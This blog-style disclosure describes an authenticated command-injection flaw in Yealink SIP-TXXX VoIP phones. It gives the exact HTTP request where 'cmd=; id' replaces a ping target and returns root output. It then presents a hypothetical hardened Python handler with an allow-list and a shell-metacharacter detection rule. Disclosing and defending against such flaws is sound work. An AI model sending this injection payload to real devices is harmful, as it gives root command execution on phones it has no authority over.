Do you love hacking phones? Well, of course, VoIP phones. This should be worth a read!
I just uncovered a vulnerability in Yealink SIP-TXXX phones. It leads to RCE, but it is authenticated, meaning you must be logged in to the web interface!
After logging in to the web interface (which may be served on port 80 or port 443), there is a Network tab. Clicking on it shows five sections: Basic, PC Port, NAT, Advanced, and Diagnostics. Clicking on Diagnostics lets us ping or perform a traceroute against an IP address. Capturing that request with Burp Suite reveals how the whole thing looks and how the parameters are sent with their values:
```http
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=start ping 127.0.0.1&token=1714636915c6acea98
```
So the parameter cmd takes the value start followed by the command to execute, ping 127.0.0.1. I thought of it as an easy win: I changed the value of the parameter cmd so that, instead of ping, it executes a basic Linux command:

cmd=; id;&token=1714636915c6acea98

and now it will execute the id command instead!
POST REQUEST

```http
POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.6597899560162612 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d2446809c4f88
Connection: close

cmd=; id&token=1957747793cee22738
```
RESPONSE

```http
HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
<div id="_RES_INFO_">
uid=0(root) gid=0(root)
</div>
</body>
</html>
```
And there we have RCE! :100:
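As an added example (not code from this post and not Yealink firmware), here is a hypothetical hardened handler for the same diagnostics request, written in Python. It parses the form body, accepts only "start ping <ip>" or "start traceroute <ip>" where the target is a literal IP address, builds an argv list so that no shell ever interprets the user's input, and separately flags request bodies that carry shell metacharacters, which is the detection view a defender would put in front of such a device. The tool paths, the ping count, and the third sample body are assumptions; the first two sample bodies are the ones shown above.

```python
"""Allow-list handling for a 'network diagnosis' cmd parameter.

Hypothetical hardened handler, not the phone's real code. It models the
body seen in the post (cmd=start ping 127.0.0.1&token=...) and refuses
anything that is not exactly one allowed tool plus one literal IP.
"""
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Only the two tools the Diagnostics page offers. Paths and the -c 4
# ping count are assumptions for this example.
ALLOWED_TOOLS = {
    "ping": ["/bin/ping", "-c", "4"],
    "traceroute": ["/usr/bin/traceroute"],
}
# Exactly: the verb "start", one tool name, one whitespace-free target.
CMD_RE = re.compile(r"^start (ping|traceroute) (\S+)$")
# Metacharacters that have no business in a ping/traceroute target.
SHELL_META_RE = re.compile(r"[;&|`$(){}<>\n\\]")


def parse_body(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into single values.

    Written by hand (split on '&' only) so the ';' in an injected body is
    kept inside the value instead of being treated as a pair separator.
    """
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def build_argv(cmd: str):
    """Return an argv list for a valid cmd value, or None to reject it.

    The target must parse with ipaddress, so hostnames, extra options
    such as "-f", and anything containing metacharacters are refused.
    """
    m = CMD_RE.match(cmd)
    if not m:
        return None
    tool, target = m.groups()
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        return None
    return ALLOWED_TOOLS[tool] + [str(addr)]


def run_diagnostic(cmd: str) -> str:
    """Execute an allow-listed diagnostic without a shell.

    subprocess.run gets a list and never shell=True, so the operating
    system receives argv verbatim and there is nothing to inject into.
    """
    argv = build_argv(cmd)
    if argv is None:
        return "rejected"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return result.stdout


def looks_injected(cmd: str) -> bool:
    """Detection view: flag cmd values that contain shell metacharacters."""
    return bool(SHELL_META_RE.search(cmd))


def audit(bodies: dict) -> dict:
    """Classify each body as (argv or None, flagged-by-metacharacter-rule)."""
    out = {}
    for name, body in bodies.items():
        cmd = parse_body(body).get("cmd", "")
        out[name] = (build_argv(cmd), looks_injected(cmd))
    return out


# Sample bodies: the first two are from the post, the third is constructed
# to show an abuse that carries no metacharacters at all.
SAMPLES = {
    "benign": "cmd=start ping 127.0.0.1&token=1714636915c6acea98",
    "injected": "cmd=; id&token=1957747793cee22738",
    "option_smuggling": "cmd=start ping -f 127.0.0.1&token=constructed",
}

if __name__ == "__main__":
    for name, verdict in audit(SAMPLES).items():
        print(name, verdict)
```

The audit of the three samples shows why the allow-list, not the metacharacter filter, is the actual fix: the injected body from the post is both rejected and flagged, but the constructed "-f" body passes the metacharacter rule and is only stopped because the target must be a bare IP address. The metacharacter rule is still useful as a log-side detection signal for requests to the network-diagnosis endpoint.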
Contact: Twitter: tahaafarooq, Telegram: tahaafarooq